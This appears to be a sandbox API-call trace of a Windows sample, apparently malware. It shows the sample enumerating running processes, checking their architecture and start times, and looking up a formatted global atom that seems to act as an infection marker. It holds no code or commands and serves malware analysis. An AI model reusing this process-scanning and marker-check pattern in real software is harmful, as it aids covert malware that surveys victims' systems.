	[0073.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.546] CloseHandle (hObject=0x224) returned 1
	[0073.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.546] CloseHandle (hObject=0x224) returned 1
	[0073.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.546] CloseHandle (hObject=0x224) returned 1
	[0073.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.546] CloseHandle (hObject=0x224) returned 1
	[0073.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72eab8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.546] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.547] CloseHandle (hObject=0x224) returned 1
	[0073.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.547] CloseHandle (hObject=0x224) returned 1
	[0073.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.547] CloseHandle (hObject=0x224) returned 1
	[0073.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.547] CloseHandle (hObject=0x224) returned 1
	[0073.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.547] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.547] CloseHandle (hObject=0x224) returned 1
	[0073.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728878, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.548] CloseHandle (hObject=0x224) returned 1
	[0073.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.548] CloseHandle (hObject=0x224) returned 1
	[0073.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e6d0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.548] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.548] CloseHandle (hObject=0x224) returned 1
	[0073.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.548] GetLastError () returned 0x5
	[0073.548] GetLastError () returned 0x5
	[0073.548] GetLastError () returned 0x5
	[0073.548] GetLastError () returned 0x5
	[0073.548] GetLastError () returned 0x5
	[0073.548] GetLastError () returned 0x5
	[0073.548] GetLastError () returned 0x5
	[0073.548] GetLastError () returned 0x5
	[0073.548] GetLastError () returned 0x5
	[0073.548] GetLastError () returned 0x5
	[0073.548] GetLastError () returned 0x5
	[0073.548] GetLastError () returned 0x5
	[0073.548] GetLastError () returned 0x5
	[0073.548] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetLastError () returned 0x5
	[0073.549] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.549] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.549] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.550] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.551] GetLastError () returned 0x5
	[0073.552] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.552] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.552] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.552] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.552] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.552] CloseHandle (hObject=0x224) returned 1
	[0073.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.552] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.552] CloseHandle (hObject=0x224) returned 1
	[0073.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.552] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.553] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.553] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.553] CloseHandle (hObject=0x224) returned 1
	[0073.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0073.596] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0073.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dcb0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.600] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.600] CloseHandle (hObject=0x224) returned 1
	[0073.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.600] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.600] CloseHandle (hObject=0x224) returned 1
	[0073.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728858, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.601] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.601] CloseHandle (hObject=0x224) returned 1
	[0073.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.601] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.601] CloseHandle (hObject=0x224) returned 1
	[0073.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.601] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.601] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.601] CloseHandle (hObject=0x224) returned 1
